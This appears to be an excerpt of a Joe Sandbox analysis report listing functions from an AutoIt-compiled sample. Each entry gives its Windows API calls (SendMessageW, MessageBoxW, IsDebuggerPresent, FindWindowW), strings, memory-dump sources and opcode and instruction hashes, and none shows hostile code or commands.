                                        • Opcode ID: 71e46f9c77f275a12c83f801404b5623d21108f5ca086fda43397bab91badf6a
                                        • Instruction ID: cd6b37da0013a6f0c522652ceda473a3b01f66f4640500dc00609cd2a04f11d4
                                        • Opcode Fuzzy Hash: 71e46f9c77f275a12c83f801404b5623d21108f5ca086fda43397bab91badf6a
                                        • Instruction Fuzzy Hash: C501D479601218AB8B09EFA4CC55FFE77B8EF46390B08061AFC32672C1EA31594C8764
                                        Function 00C51BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C51C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: ee60db606696d3acb54514e5abc73c500750b73dff70221447610834bb471b35
                                        • Instruction ID: fc4b0b93ba1cdc19af999027bfa4db4122e0f7a1ec4fe83c2862bdda3db58127
                                        • Opcode Fuzzy Hash: ee60db606696d3acb54514e5abc73c500750b73dff70221447610834bb471b35
                                        • Instruction Fuzzy Hash: 5D01A77968110867CB04EF90C955BFF77E8DF11381F180069FD1667282EA21AF4CD6B9
                                        Function 00C51C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C51CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: c72597ac0efdaf3ad616bf629f92be7e4a2c342b4e6551610675021d21b17205
                                        • Instruction ID: 0875503f693a3f0acd49bbcdca5bce674005bc4710f55047d15c429f83af0a9f
                                        • Opcode Fuzzy Hash: c72597ac0efdaf3ad616bf629f92be7e4a2c342b4e6551610675021d21b17205
                                        • Instruction Fuzzy Hash: 5601D67969015867CB04EBA5CA05BFE77EC9B113C1F180025BD12B3281EA22AF4CD679
                                        Function 00C51D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C51DD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 776a2f64603bad36f6b7e9e4b39d9941b9e121e54798e1a5d439f1e2d22723d7
                                        • Instruction ID: 0320a4393e63b9c5b8fcc980420cca1f4e6b2bfc7aa28a64dae887bf35032bfc
                                        • Opcode Fuzzy Hash: 776a2f64603bad36f6b7e9e4b39d9941b9e121e54798e1a5d439f1e2d22723d7
                                        • Instruction Fuzzy Hash: C5F0A475A5121867DB05EBA5CC96BFE77B8EB01391F080915FD22A32C1EA706A4C8268
                                        Function 00C7747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: 3, 3, 16, 1
                                        • API String ID: 176396367-3042988571
                                        • Opcode ID: e14994d11e77033570ba1abceb63a05ca8c9864c7ee6102b6a96e6c91701555b
                                        • Instruction ID: bfc3510dcc6a9acac5e7f527d9db7986c77361629ff0c4cee47dd5aa035e3149
                                        • Opcode Fuzzy Hash: e14994d11e77033570ba1abceb63a05ca8c9864c7ee6102b6a96e6c91701555b
                                        • Instruction Fuzzy Hash: 70E06102304320109335127ADCC19FF56CDDFC6750B14192BF989C2276EA94CED2B3A0
                                        Function 00C50B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C50B23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 2030045667-4017498283
                                        • Opcode ID: 066e00dce03d207413c6801c4a15f26d4307440e25310c8f386e5b6032fa6bfe
                                        • Instruction ID: 95169b269c25529d4008b3ed3108c46a003207012dc28ffbcb892ab8dd086352
                                        • Opcode Fuzzy Hash: 066e00dce03d207413c6801c4a15f26d4307440e25310c8f386e5b6032fa6bfe
                                        • Instruction Fuzzy Hash: 93E0483124431866D22437547C43FC97B849F05F65F10047AFB68955C38AF165D157FD
                                        Function 00C10D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C0F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C10D71,?,?,?,00BF100A), ref: 00C0F7CE
                                        • IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C10D75
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C10D84
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C10D7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 55579361-631824599
                                        • Opcode ID: 516a97f123390ad81a92cd384abadff55926b1372f1e6b45f7b1d5ac4ad6f4d7
                                        • Instruction ID: 8239f7b2e77eb71c06d00386c53a0e08dc3c63b6a307148f64f134856d9a45ff
                                        • Opcode Fuzzy Hash: 516a97f123390ad81a92cd384abadff55926b1372f1e6b45f7b1d5ac4ad6f4d7
                                        • Instruction Fuzzy Hash: 01E06DB02007418BD330AFBDE8487867BE0AB05744F04492DE482C7AA2DBF4E4C59BA1
                                        Function 00C4D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: aa4f29685a96c2e8f70821de9a29483696ad4fc8076773edab8c329a923bd4f2
                                        • Instruction ID: 7fe6a530a8ffb42ef39831723b67f6ff4b6ae53935ab1ab190aee5f82faa416a
                                        • Opcode Fuzzy Hash: aa4f29685a96c2e8f70821de9a29483696ad4fc8076773edab8c329a923bd4f2
                                        • Instruction Fuzzy Hash: 4ED062B1C09119EACBA0A6D1DC899B9B3BCBB58341F548466FD0791080D674D949AB61
                                        Function 00C82356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8236C
                                        • PostMessageW.USER32(00000000), ref: 00C82373
                                          • Part of subcall function 00C5E97B: Sleep.KERNEL32 ref: 00C5E9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 100339018a6d66ebab38608c75506db53ad3e39bcbcf19781faa148e2eb17ca5
                                        • Instruction ID: 46c649f419a0c94af9856bbeef1aef7b94b51e49b742463fa97d3c54d33b288c
                                        • Opcode Fuzzy Hash: 100339018a6d66ebab38608c75506db53ad3e39bcbcf19781faa148e2eb17ca5
                                        • Instruction Fuzzy Hash: E1D0A9323803007AE668A330EC4FFCA66049B00B00F0009227601AA0D0C8B0B8458B28
                                        Function 00C82322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8232C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C8233F
                                          • Part of subcall function 00C5E97B: Sleep.KERNEL32 ref: 00C5E9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 3ddca1890cda352d497f9184fe0ec16a1f04fd2c3072f9c8abc94e04d2602893
                                        • Instruction ID: d83afbe3355c2ae51929df87bb29c9a870bfc733ab7aa0dce0a870211b882926
                                        • Opcode Fuzzy Hash: 3ddca1890cda352d497f9184fe0ec16a1f04fd2c3072f9c8abc94e04d2602893
                                        • Instruction Fuzzy Hash: FDD02236384300B7E668B330EC4FFCB7A049B00B00F0009227705AA0D0C8F0B845CB28
                                        Function 00C2BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C2BE93
                                        • GetLastError.KERNEL32 ref: 00C2BEA1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C2BEFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 295c84f6217bd1f1409657bf124867426be4aac4fe4557c6e73e2dff7ec68c35
                                        • Instruction ID: ed7ab0a21819819484f263b048ed57aa78657ffc1368e595562137483c8b5ed7
                                        • Opcode Fuzzy Hash: 295c84f6217bd1f1409657bf124867426be4aac4fe4557c6e73e2dff7ec68c35
                                        • Instruction Fuzzy Hash: 0441F939600226AFCF21CFA5ED84BFA7BA5EF41310F154159F979575A1DB308E01DB60